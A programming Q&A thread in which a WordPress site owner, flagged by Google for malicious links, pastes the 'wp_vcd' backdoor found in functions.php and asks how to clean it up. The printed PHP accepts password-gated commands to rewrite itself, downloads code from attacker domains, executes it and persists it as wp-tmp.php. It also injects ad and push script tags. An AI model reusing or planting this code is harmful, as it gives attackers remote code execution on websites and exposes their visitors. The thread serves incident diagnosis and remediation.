# WordPress injected js scripts

Tags: javascript, php, wordpress, security, ssl

Google notified me that there are malicious links on my website:

```
https://cobalten.com/apu.php?zoneid=2025634
https://go.oclasrv.com/apu.php?zoneid=2025634
https://wowreality.info/page.js?wm=gr
```

It's a small website consists of few pages 3-4 https://explivia.com .

I searched the whole website and viewed all the requests from the `networks` tab, But didn't find any of there websites.

I scanned the website https://sitecheck.sucuri.net/results/https/explivia.com , And it seems there are 3 related pages:

```
https://explivia.com/
https://explivia.com/404
https://explivia.com/contact
```

I viewed the `.htaccess` and some of the php/html files, Including `404.php` as it seems that this page is affected, But couldn't find anything.

The same issue here `https://productforums.google.com/forum/#!topic/webmasters/tQGGTdhc7D8`

What to do so solve this issue?

**UPDATE**

I found this code at the top of `functions.php`:

```
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '4d742d51a12bb45b13f2b825bde37951'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {
                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
```

{
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))
                                                                                                                 {

```
                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }
                  }
                                }
                        }
                break;
                case 'change_code';
                    if (isset($_REQUEST['newcode']))
                        {
                            if (!empty($_REQUEST['newcode']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__)) {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }

        die("");
    }








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


$wp_auth_key='ab616016c8af72054b117be51c745347';
        if (($tmpcontent = @file_get_contents("http://www.gatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.gatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.gatots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } 

                elseif ($tmpcontent = @file_get_contents("http://www.gatots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 





    }
}

//$start_wp_theme_tmp



//wp_tmp

//$end_wp_theme_tmp
```

I checked `wp-tmp.php` and found related malicious js files:

```
<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=2025634"></script>
<script src="//fortpush.com/ntfc.php?p=2025636" data-cfasync="false" async></script>
```

Comment: I believe this question should be posted under webmasters. https://webmasters.stackexchange.com/

Comment: Look for stuff that's base64 encoded/decoded that doesn't belong. That's one way those things are hidden.

Comment: Any reason you're using a 307 redirect instead of a 301? Eg, http://explivia.com 307-redirects to https where normally I'd expect to see a 301. This was also mentioned in the forum thread you linked, hence the question.

Comment: @hacksalot, The host provided a plugin for redirecting to https

Comment: This is offtopic here as not related to programming but the generic and only foolproof way of handling cases like that is: WIPE OUT the entire server, do not try to reconstruct/fix it in any way, and start a new server from scratch, based on some backups that you will double check before so that they are not infected either.

Comment: @PatrickMevzek, So the server is the reason and I have to find better/more secured one?

Comment: WordPress is more probably the culprit or any plugin installed with it. The underlying server makes little difference.

Comment: How to know how that malicious code was added to the files? Is it possible to find out if there is a bash file or something executed by a hacker?

Answer (score 0):

The topic is old but some people might need to see this answer.
It looks like you use Wordpress and you have installed a malicious plugin or theme.
You need to remove wp-tmp.php and install the plugin [Anti-Malware Security and Brute-Force Firewall](https://fr.wordpress.org/plugins/gotmls/) with a scan.
It will check every file on your website and let you see what is wrong.